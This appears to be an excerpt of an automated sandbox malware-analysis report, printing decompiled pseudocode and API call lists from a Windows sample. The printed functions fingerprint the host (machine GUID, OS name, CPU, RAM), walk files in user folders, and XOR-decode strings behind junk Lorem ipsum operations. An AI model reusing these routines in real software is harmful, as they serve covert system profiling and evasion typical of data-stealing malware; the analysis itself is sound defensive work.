0x0041247e
0x00412483
0x00412486
0x0041248e
0x0041248e
0x0041249a
0x004124a0
0x0041249c
0x0041249c
0x0041249c
0x004124af
0x004124b4
0x004124c2
0x004124cf
0x004124dc
0x004124e9
0x004124f6
0x004124fc
0x00412504
0x00412507
0x0041250c
0x00412519
0x0041251b
0x004123fa
0x0041252d
0x0041253b
0x00412545

APIs

__EH_prolog3_GS.LIBCMT ref: 00412135

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

_memset.LIBCMT ref: 0041216A
_memset.LIBCMT ref: 0041217B
lstrcat.KERNEL32(?,00000000), ref: 00412193
lstrcat.KERNEL32(?), ref: 004121A6
lstrcat.KERNEL32(?), ref: 004121B9
lstrcat.KERNEL32(?,00000000), ref: 004121CF
lstrcat.KERNEL32(?), ref: 004121E2
lstrcat.KERNEL32(?,0043F684), ref: 004121F4

Part of subcall function 00417F60: __EH_prolog3_GS.LIBCMT ref: 00417F6A
Part of subcall function 00417F60: FindFirstFileW.KERNEL32(00000000,?,0041221C), ref: 00417F9E
Part of subcall function 00417F60: FindNextFileW.KERNEL32(?,?,00000001,?,00000001), ref: 0041801E

Part of subcall function 00417D3E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,0043D130,?,?,?,?,?,0041743C,?), ref: 00417D61
Part of subcall function 00417D3E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,?,0041743C,?,?), ref: 00417D86

Part of subcall function 0040CEE5: __EH_prolog3.LIBCMT ref: 0040CEEC
Part of subcall function 0040CEE5: _strlen.LIBCMT ref: 0040CF18
Part of subcall function 0040CEE5: _strlen.LIBCMT ref: 0040CF35

Part of subcall function 00404DB2: _strlen.LIBCMT ref: 00404DBF

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_strlen$_memset$ByteCharFileFindH_prolog3_MultiWide$FirstFolderH_prolog3NextPath
String ID:
API String ID: 1439315367-0
Opcode ID: 5a71ddfa6fa473fac914a6f78ea99c6db8dbe0c9ba5841a5cef951b407f3118d
Instruction ID: df1e74e0994551737292f981299865978177f276c9acf46d80dc33ec1b95e9f4
Opcode Fuzzy Hash: 5a71ddfa6fa473fac914a6f78ea99c6db8dbe0c9ba5841a5cef951b407f3118d
Instruction Fuzzy Hash: 8CB18171D00118EFDB21EB65CD45ADEBBB8FF45304F1080EAA049A3291DE786B85CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414333 Relevance: 13.6, APIs: 9, Instructions: 118
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00414333(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _t74;
				signed char _t75;
				void* _t86;
				intOrPtr _t98;
				void* _t100;
				intOrPtr _t107;
				void* _t110;

				_t98 = __edx;
				E00423679(E0043456E, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t110 - 0x270)) =  *((intOrPtr*)(_t110 + 8));
				 *((intOrPtr*)(_t110 - 0x264)) =  *((intOrPtr*)(_t110 + 0xc));
				_t89 = 0;
				 *((intOrPtr*)(_t110 - 0x26c)) =  *((intOrPtr*)(_t110 + 0x10));
				_t100 = __ecx;
				 *((intOrPtr*)(_t110 - 0x260)) = 0;
				 *((intOrPtr*)(_t110 - 0x25c)) = 0;
				E0041F6B0(_t110 - 0x118, 0, 0x104);
				 *0x4474e0(_t110 - 0x118, E004181BE(0, _t100, 0x104, 0x1c), 0x268);
				 *0x4474e0(_t110 - 0x118, _t100);
				E0041F6B0(_t110 - 0x220, 0, 0x104);
				 *0x4474e0(_t110 - 0x220, _t110 - 0x118);
				 *0x4474e0(_t110 - 0x220, "\\");
				 *0x4474e0(_t110 - 0x220,  *0x446d14);
				E004049CF(_t110 - 0x23c, _t110 - 0x220);
				 *(_t110 - 4) = 0;
				_t74 = E00417DAA(_t110 - 0x23c, _t110 - 0x258);
				if(_t74[0xa] >= 8) {
					_t74 =  *_t74;
				}
				_t75 = GetFileAttributesW(_t74); // executed
				if(_t75 == 0xffffffff) {
					L4:
					 *((intOrPtr*)(_t110 - 0x268)) = _t89;
					goto L5;
				} else {
					 *((intOrPtr*)(_t110 - 0x268)) = 1;
					if((_t75 & 0x00000010) == 0) {
						L5:
						_t106 = _t110 - 0x258;
						E0040CE40(0, _t110 - 0x258, 1);
						 *(_t110 - 4) =  *(_t110 - 4) | 0xffffffff;
						E00404A66(_t110 - 0x23c, 1, _t89);
						_t118 =  *((intOrPtr*)(_t110 - 0x268)) - _t89;
						if( *((intOrPtr*)(_t110 - 0x268)) != _t89) {
							_push(_t110 - 0x25c);
							_push(_t110 - 0x220);
							_t86 = E0040F8E2(_t89, _t110 - 0x260, 0, _t106, _t118); // executed
							if(_t86 == 0) {
								E0040F848(_t110 - 0x260, _t110 - 0x25c);
							}
						}
						_t107 =  *((intOrPtr*)(_t110 - 0x270));
						E00411603(_t107, _t98, 0x43d12c, _t110 - 0x118,  *((intOrPtr*)(_t110 - 0x264)),  *((intOrPtr*)(_t110 - 0x260)),  *((intOrPtr*)(_t110 - 0x25c)),  *((intOrPtr*)(_t107 + 0x20)),  *((intOrPtr*)(_t110 - 0x26c))); // executed
						if( *((intOrPtr*)(_t107 + 6)) != _t89) {
							_t89 = 0; // executed
							E00413B4B(0, _t107, _t110 - 0x118,  *((intOrPtr*)(_t110 - 0x264))); // executed
						}
						E0040F848(_t110 - 0x260, _t110 - 0x25c);
						return E004236C3(_t89, _t110 - 0x260, _t110 - 0x25c);
					}
					goto L4;
				}
			}

0x00414333
0x0041433d
0x00414345
0x0041434e
0x00414357
0x0041435f
0x0041436d
0x0041436f
0x00414375
0x0041437b
0x00414393
0x004143a1
0x004143b0
0x004143c6
0x004143d8
0x004143eb
0x004143fe
0x00414410
0x00414413
0x0041441c
0x0041441e
0x0041441e
0x00414421
0x0041442a
0x0041443a
0x0041443a
0x00000000
0x0041442c
0x0041442c
0x00414438
0x00414440
0x00414444
0x0041444a
0x0041444f
0x0041445c
0x00414461
0x00414467
0x0041446f
0x00414476
0x0041447d
0x00414486
0x00414494
0x00414494
0x00414486
0x0041449f
0x004144c8
0x004144d0
0x004144e0
0x004144e2
0x004144e2
0x004144f3
0x004144fd
0x004144fd
0x00000000
0x00414438

APIs

__EH_prolog3_GS.LIBCMT ref: 0041433D
_memset.LIBCMT ref: 0041437B

Part of subcall function 004181BE: _memset.LIBCMT ref: 004181DF
Part of subcall function 004181BE: SHGetFolderPathA.SHELL32(00000000,00408F7C,00000000,00000000,?), ref: 004181F7

lstrcat.KERNEL32(?,00000000), ref: 00414393
lstrcat.KERNEL32(?), ref: 004143A1
_memset.LIBCMT ref: 004143B0
lstrcat.KERNEL32(?,?), ref: 004143C6
lstrcat.KERNEL32(?,0043D134), ref: 004143D8
lstrcat.KERNEL32(?), ref: 004143EB

Part of subcall function 004049CF: _strlen.LIBCMT ref: 004049E6

Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000104,?,?,?,00408FFE,?,?), ref: 00417DCB
Part of subcall function 00417DAA: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,00408FFE,?,?,?,?,?,0040939F), ref: 00417DFC

GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00414421

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$ByteCharMultiWide$AttributesFileFolderH_prolog3_Path_strlen
String ID:
API String ID: 1501748803-0
Opcode ID: ea6b2cd277203bb77b9b0fb375ba5986988b2fb1312cd60a4d2d5c00b02dc70f
Instruction ID: d4f986f494a96e0d1a833cc749319016eaccba62c496031fa0428145d82c63ee
Opcode Fuzzy Hash: ea6b2cd277203bb77b9b0fb375ba5986988b2fb1312cd60a4d2d5c00b02dc70f
Instruction Fuzzy Hash: 12410F7290422DAFDF20DFA0DC89ADAB778BF48314F1441EAA609A3151DB359F85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B5B1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040B5B1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t45;
				CHAR* _t48;
				CHAR* _t52;
				intOrPtr _t57;
				int _t61;
				char _t65;
				void* _t79;
				CHAR* _t81;
				void* _t85;
				void* _t86;
				void* _t87;
				void* _t91;

				_t91 = __eflags;
				_t79 = __edx;
				_push(0x4c);
				E00423679(E00433BDA, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t86 - 0x50)) =  *((intOrPtr*)(_t86 + 0x44));
				 *((intOrPtr*)(_t86 - 4)) = 0;
				 *((intOrPtr*)(_t86 - 0x18)) = 0xf;
				 *((intOrPtr*)(_t86 - 0x1c)) = 0;
				 *(_t86 - 0x2c) = 0;
				_push(1);
				_t88 = _t87 - 0x1c;
				 *((intOrPtr*)(_t86 - 0x58)) = _t87 - 0x1c;
				 *((char*)(_t86 - 4)) = 2;
				 *(_t86 - 0x4c) = 0;
				 *((intOrPtr*)(_t86 - 0x54)) = 0;
				E00404E93(_t88, _t86 + 0x28);
				_push(_t86 - 0x48); // executed
				_t45 = E0040ABDE(0, __edi, _t88, _t91); // executed
				_t81 = _t86 - 0x2c;
				 *((char*)(_t86 - 4)) = 3;
				E00404A22(_t81, _t45);
				 *((char*)(_t86 - 4)) = 2;
				E00404A66(_t86 - 0x48, 1, 0);
				_t48 =  *(_t86 - 0x2c);
				if( *((intOrPtr*)(_t86 - 0x18)) < 0x10) {
					_t48 = _t81;
				}
				_t85 = "ERROR";
				_push(_t85);
				_push(_t48);
				if( *0x447510() == 0) {
					L12:
					_push(E004201E0(_t85));
					_push(_t85);
				} else {
					_t57 =  *((intOrPtr*)(_t86 + 0xc));
					if( *((intOrPtr*)(_t86 + 0x20)) < 0x10) {
						_t57 = _t86 + 0xc;
					}
					if(E0040CD72(0, _t86 - 0x2c, _t57,  *((intOrPtr*)(_t86 + 0x1c))) == 0xffffffff) {
						_t81 =  *(_t86 - 0x4c);
					} else {
						E00404C57(_t86 - 0x2c, 0, _t60 +  *((intOrPtr*)(_t86 + 8)));
						_t65 =  *(_t86 - 0x2c);
						if( *((intOrPtr*)(_t86 - 0x18)) < 0x10) {
							_t65 = _t86 - 0x2c;
						}
						_t81 = E00421D3B(0, _t79, _t81, _t65,  *((intOrPtr*)(_t86 - 0x50)), _t86 - 0x54);
					}
					_t61 = lstrlenA(_t81);
					_t97 = _t61 - 1;
					if(_t61 < 1) {
						goto L12;
					} else {
						_push(E004201E0(_t81));
						_push(_t81);
					}
				}
				E00404AAA(0x4452cc, _t97);
				_t52 =  *(_t86 - 0x2c);
				 *((intOrPtr*)(_t86 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t86 - 0x18)) < 0x10) {
					_t52 = _t86 - 0x2c;
				}
				 *_t52 = 0;
				E00404A66(_t86 - 0x2c, 1, 0);
				E00404A66(_t86 + 0xc, 1, 0);
				E00404A66(_t86 + 0x28, 1, 0);
				return E004236C3(0, _t81, _t85);
			}

0x0040b5b1
0x0040b5b1
0x0040b5b1
0x0040b5b8
0x0040b5c0
0x0040b5c5
0x0040b5c8
0x0040b5cf
0x0040b5d2
0x0040b5d5
0x0040b5d7
0x0040b5df
0x0040b5e2
0x0040b5e7
0x0040b5ea
0x0040b5ed
0x0040b5f5
0x0040b5f6
0x0040b600
0x0040b603
0x0040b607
0x0040b612
0x0040b616
0x0040b61f
0x0040b622
0x0040b624
0x0040b624
0x0040b626
0x0040b62b
0x0040b62c
0x0040b635
0x0040b69e
0x0040b6a5
0x0040b6a6
0x0040b637
0x0040b63b
0x0040b63e
0x0040b640
0x0040b640
0x0040b655
0x0040b684
0x0040b657
0x0040b65f
0x0040b668
0x0040b66b
0x0040b66d
0x0040b66d
0x0040b680
0x0040b680
0x0040b688
0x0040b68e
0x0040b691
0x00000000
0x0040b693
0x0040b69a
0x0040b69b
0x0040b69b
0x0040b691
0x0040b6ac
0x0040b6b5
0x0040b6b8
0x0040b6bb
0x0040b6bd
0x0040b6bd
0x0040b6c6
0x0040b6c8
0x0040b6d3
0x0040b6de
0x0040b6e8

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B5B8

Part of subcall function 0040ABDE: __EH_prolog3_GS.LIBCMT ref: 0040ABE8
Part of subcall function 0040ABDE: _strlen.LIBCMT ref: 0040ACC3

Part of subcall function 00404A22: _memmove.LIBCMT ref: 00404A3E

Part of subcall function 00404A66: _memmove.LIBCMT ref: 00404A86

StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040B62D
_strtok_s.LIBCMT ref: 0040B678
lstrlenA.KERNEL32(?,?,?,?), ref: 0040B688
_strlen.LIBCMT ref: 0040B694
_strlen.LIBCMT ref: 0040B69F

Strings

ERROR, xrefs: 0040B626, 0040B62B, 0040B69E, 0040B6A6

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: _strlen$H_prolog3__memmove$_strtok_slstrlen
String ID: ERROR
API String ID: 2025287377-2861137601
Opcode ID: 89dd53bc574835396727b27958c6a66562ab18639d9d4230ad8a31f8a19fa1fc
Instruction ID: 0a95e8090fd1ec6bd3d58b1e76a0696a890266a2d0c3dd4f16860e1630856129
Opcode Fuzzy Hash: 89dd53bc574835396727b27958c6a66562ab18639d9d4230ad8a31f8a19fa1fc
Instruction Fuzzy Hash: 80415371D00208AFDF01DFA9C881AEEB7B8EF18314F50852AF511B7281D7799A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417207 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00417207(void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				int _v524;
				void* _v528;
				void* __ebx;
				signed int _t15;
				long _t20;
				void* _t36;
				void* _t37;
				void* _t38;
				signed int _t39;

				_t38 = __esi;
				_t37 = __edi;
				_t36 = __edx;
				_t15 =  *0x444664; // 0xfa3a0753
				_v8 = _t15 ^ _t39;
				_v524 = 0;
				_v524 = 0xff;
				_v264 = 0;
				E0041F6B0( &_v263, 0, 0xfe);
				_t20 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119,  &_v528); // executed
				if(_t20 == 0) {
					RegQueryValueExA(_v528, "MachineGuid", 0, 0,  &_v264,  &_v524); // executed
				}
				RegCloseKey(_v528);
				CharToOemA( &_v264,  &_v520);
				E004049CF(_t38,  &_v520);
				return E0041F69E(_t38, 0, _v8 ^ _t39, _t36, _t37, _t38);
			}

0x00417207
0x00417207
0x00417207
0x00417210
0x00417217
0x00417228
0x00417230
0x0041723a
0x00417240
0x0041725f
0x00417267
0x00417284
0x00417284
0x00417290
0x004172a4
0x004172b3
0x004172c6

APIs

_memset.LIBCMT ref: 00417240
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00000000), ref: 0041725F
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00417284
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00417290
CharToOemA.USER32(?,?), ref: 004172A4

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00417255
MachineGuid, xrefs: 00417279

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2235053359-1211650757
Opcode ID: 92af5feb086a4413c3bc76d91f3b171f3af087f67a5a55b02fa6ab132bdc59a1
Instruction ID: 430497eb41d1576f2849ef6f776467aa8df3f0f9736cc139c440cb3c0ae80230
Opcode Fuzzy Hash: 92af5feb086a4413c3bc76d91f3b171f3af087f67a5a55b02fa6ab132bdc59a1
Instruction Fuzzy Hash: EB114FB5A0421CAFDB10DF60DD89FEAB7BCEB04308F1001B6A619A2152DA745E898F54

Uniqueness

Uniqueness Score: -1.00%

Function 0041709D Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041709D(void* __edi, void* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				void* _v524;
				int _v528;
				void* __ebx;
				signed int _t14;
				long _t19;
				void* _t32;
				void* _t33;
				void* _t34;
				signed int _t35;

				_t34 = __esi;
				_t33 = __edi;
				_t14 =  *0x444664; // 0xfa3a0753
				_v8 = _t14 ^ _t35;
				_v528 = 0xff;
				_v264 = 0;
				E0041F6B0( &_v263, 0, 0xfe);
				_t19 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119,  &_v524); // executed
				if(_t19 == 0) {
					RegQueryValueExA(_v524, "ProductName", 0, 0,  &_v264,  &_v528); // executed
				}
				RegCloseKey(_v524);
				CharToOemA( &_v264,  &_v520);
				return E0041F69E( &_v520, 0, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0041709d
0x0041709d
0x004170a6
0x004170ad
0x004170c0
0x004170ca
0x004170d0
0x004170ef
0x004170f7
0x00417114
0x00417114
0x00417120
0x00417134
0x0041714c

APIs

_memset.LIBCMT ref: 004170D0
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,?), ref: 004170EF
RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,?,000000FF,?,?,?), ref: 00417114
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00417120
CharToOemA.USER32(?,?), ref: 00417134

Strings

ProductName, xrefs: 00417109
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004170E5

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 2235053359-1787575317
Opcode ID: 36cfb9c4478d90bb1347b3328799aae9a1c33a3e9f73ab56a865dae4582f1f8c
Instruction ID: fff07deab9e1fd37cfef131056681af93b959cd720280e3b64706863887ce2cc
Opcode Fuzzy Hash: 36cfb9c4478d90bb1347b3328799aae9a1c33a3e9f73ab56a865dae4582f1f8c
Instruction Fuzzy Hash: 031125B590421DAFDB10DF50DD89FEAB7BCEB14304F0000F6AA19E2162D7745E898F54

Uniqueness

Uniqueness Score: -1.00%

Function 00416D27 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00416D27(void* __edi, void* __esi) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v520;
				void* _v524;
				int _v528;
				void* __ebx;
				signed int _t14;
				long _t19;
				void* _t32;
				void* _t33;
				void* _t34;
				signed int _t35;

				_t34 = __esi;
				_t33 = __edi;
				_t14 =  *0x444664; // 0xfa3a0753
				_v8 = _t14 ^ _t35;
				_v528 = 0xff;
				_v264 = 0;
				E0041F6B0( &_v263, 0, 0xfe);
				_t19 = RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119,  &_v524); // executed
				if(_t19 == 0) {
					RegQueryValueExA(_v524, "ProcessorNameString", 0, 0,  &_v264,  &_v528); // executed
				}
				RegCloseKey(_v524);
				CharToOemA( &_v264,  &_v520);
				return E0041F69E( &_v520, 0, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00416d27
0x00416d27
0x00416d30
0x00416d37
0x00416d4a
0x00416d54
0x00416d5a
0x00416d79
0x00416d81
0x00416d9e
0x00416d9e
0x00416daa
0x00416dbe
0x00416dd6

APIs

_memset.LIBCMT ref: 00416D5A
RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,?), ref: 00416D79
RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,?,000000FF,?,?,?), ref: 00416D9E
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00416DAA
CharToOemA.USER32(?,?), ref: 00416DBE

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00416D6F
ProcessorNameString, xrefs: 00416D93

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValue_memset
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
API String ID: 2235053359-2804670039
Opcode ID: bfa6b7a74a61fb621c313706a00cf05431e6e132e151be4439105edc58f16092
Instruction ID: 288488dab0a583620ee8292e87886e4a9100df3bc04a01248a7d9fc2f1dffe0f
Opcode Fuzzy Hash: bfa6b7a74a61fb621c313706a00cf05431e6e132e151be4439105edc58f16092
Instruction Fuzzy Hash: 141121B594021CAFDB10DF60DD89FEAB7BCEB14304F1001F5A619E2062DB749E898F54

Uniqueness

Uniqueness Score: -1.00%

Function 00416FCD Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416FCD(void* __ebx, void* __esi) {
				signed int _v8;
				unsigned int _v64;
				signed int _v68;
				char _v76;
				void* __edi;
				signed int _t12;
				struct _MEMORYSTATUSEX* _t18;
				unsigned int _t19;
				unsigned int _t23;
				void* _t24;
				signed int _t25;
				void* _t29;
				CHAR* _t30;
				void* _t31;
				signed int _t32;

				_t31 = __esi;
				_t24 = __ebx;
				_t12 =  *0x444664; // 0xfa3a0753
				_v8 = _t12 ^ _t32;
				_t30 = HeapAlloc(GetProcessHeap(), 0, 0x104);
				E0041F6B0( &_v76, 0, 0x40);
				_t18 =  &_v76;
				_v76 = 0x40;
				GlobalMemoryStatusEx(_t18); // executed
				if(_t18 != 1) {
					_t25 = 0;
					_t19 = 0;
				} else {
					_t23 = _v64;
					_t25 = (_t23 << 0x00000020 | _v68) >> 0x14;
					_t19 = _t23 >> 0x14;
				}
				wsprintfA(_t30, "%d MB", _t25);
				return E0041F69E(_t30, _t24, _v8 ^ _t32, _t29, _t30, _t31, _t19);
			}

0x00416fcd
0x00416fcd
0x00416fd3
0x00416fda
0x00416ff4
0x00416ffc
0x00417004
0x00417008
0x0041700f
0x00417018
0x00417029
0x0041702b
0x0041701a
0x0041701a
0x00417020
0x00417024
0x00417024
0x00417035
0x0041704c

APIs

GetProcessHeap.KERNEL32(00000000,00000104,0043D130), ref: 00416FE5
HeapAlloc.KERNEL32(00000000), ref: 00416FEC
_memset.LIBCMT ref: 00416FFC
GlobalMemoryStatusEx.KERNEL32(?), ref: 0041700F
wsprintfA.USER32 ref: 00417035

Strings

%d MB, xrefs: 0041702F
@, xrefs: 00417008

Memory Dump Source

Source File: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.245003002.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
String ID: %d MB$@
API String ID: 3402858368-3474575989
Opcode ID: b8b35bbf37fc29d73e8f8bae60ede6185bce24a32721d9b48b5d7047cf91c3ff
Instruction ID: 4c85e4ed9321c4d03c028951bfe815d0c9608e38f97dc63f91b87ab1604bf9ce
Opcode Fuzzy Hash: b8b35bbf37fc29d73e8f8bae60ede6185bce24a32721d9b48b5d7047cf91c3ff
Instruction Fuzzy Hash: 9C018BB5A04208ABD704DFA4DD46FBE7BB8EB45704F44003AFA05E6291DF749846875D

Uniqueness

Uniqueness Score: -1.00%

Function 00404114 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E00404114(intOrPtr __ecx, intOrPtr _a4, CHAR* _a8) {
				signed int _v8;
				char _v1008;
				char _v2008;
				intOrPtr _v2012;
				CHAR* _v2016;
				intOrPtr _v2020;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t61;
				char* _t62;
				void* _t80;
				signed int _t113;
				void* _t128;
				void* _t130;
				void* _t131;
				intOrPtr _t138;
				signed int _t139;
				void* _t140;
				signed int _t142;
				void* _t143;
				void* _t145;

				_t58 =  *0x444664; // 0xfa3a0753
				_v8 = _t58 ^ _t142;
				_t138 = __ecx;
				_t140 = 0x3e8;
				_v2016 = _a8;
				_v2012 = __ecx;
				_t130 = 0x3e8;
				_t61 =  &_v1008;
				do {
					 *_t61 = 0;
					_t61 = _t61 + 1;
					_t130 = _t130 - 1;
				} while (_t130 != 0);
				_t131 = 0x3e8;
				_t62 =  &_v2008;
				do {
					 *_t62 = 0;
					_t62 = _t62 + 1;
					_t131 = _t131 - 1;
				} while (_t131 != 0);
				E0041F7D0( &_v1008, "Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. ");
				E0041F7D0( &_v2008, "Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.");
				E0041F730( &_v1008,  &_v2008);
				E0041F730( &_v1008,  &_v2008);
				E0041F730( &_v1008,  &_v2008);
				E0041F730( &_v1008,  &_v2008);
				_t80 = LocalAlloc(0x40, _t138 + 1); // executed
				_t128 = _t80;
				E0041F730( &_v1008,  &_v2008);
				E0041F730( &_v1008,  &_v2008);
				 *((char*)(_t138 + _t128)) = 0;
				E0041F730( &_v1008,  &_v2008);
				E0041F730( &_v1008,  &_v2008);
				_t139 = 0;
				_t145 = _t143 + 0x50;
				if(_v2012 > 0) {
					_v2020 = _a4 - _t128;
					do {
						E0041F730( &_v1008,  &_v2008);
						E0041F730( &_v1008,  &_v2008);
						_t113 = lstrlenA(_v2016);
						_t136 = _t139 % _t113;
						 *(_t128 + _t139) = _v2016[_t139 % _t113] ^  *(_v2020 + _t128 + _t139);
						E0041F730( &_v1008,  &_v2008);
						E0041F730( &_v1008,  &_v2008);
						E0041F730( &_v1008,  &_v2008);
						_t145 = _t145 + 0x28;
						_t139 = _t139 + 1;
					} while (_t139 < _v2012);
					_t140 = 0x3e8;
				}
				E0041F730( &_v1008,  &_v2008);
				E0041F730( &_v1008,  &_v2008);
				E0041F6B0( &_v1008, 0, _t140);
				E0041F6B0( &_v2008, 0, _t140);
				return E0041F69E(_t128, _t128, _v8 ^ _t142, _t136, _t139, _t140);
			}

0x0040411d
0x00404124
0x0040412d
0x0040412f
0x00404134
0x0040413a
0x00404140
0x00404142
0x00404148
0x00404148
0x0040414b
0x0040414c
0x0040414c
0x0040414f
0x00404151
0x00404157
0x00404157
0x0040415a
0x0040415b
0x0040415b
0x0040416a
0x0040417b
0x0040418e
0x004041a1
0x004041b4
0x004041c7
0x004041d5
0x004041db
0x004041eb
0x004041fe
0x00404211
0x00404215
0x00404228
0x0040422d
0x0040422f
0x00404238
0x00404243
0x00404249
0x00404257
0x0040426a
0x0040427b
0x00404287
0x0040429b
0x004042ab
0x004042be
0x004042d1
0x004042d6
0x004042d9
0x004042da
0x004042e6
0x004042e6
0x004042f9
0x0040430c
0x0040431b
0x0040432a
0x00404342

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 004041D5
lstrlenA.KERNEL32(?), ref: 0040427B
_memset.LIBCMT ref: 0040431B
_memset.LIBCMT ref: 0040432A

Strings

Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat., xrefs: 00404175
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. , xrefs: 00404164

Memory Dump Source

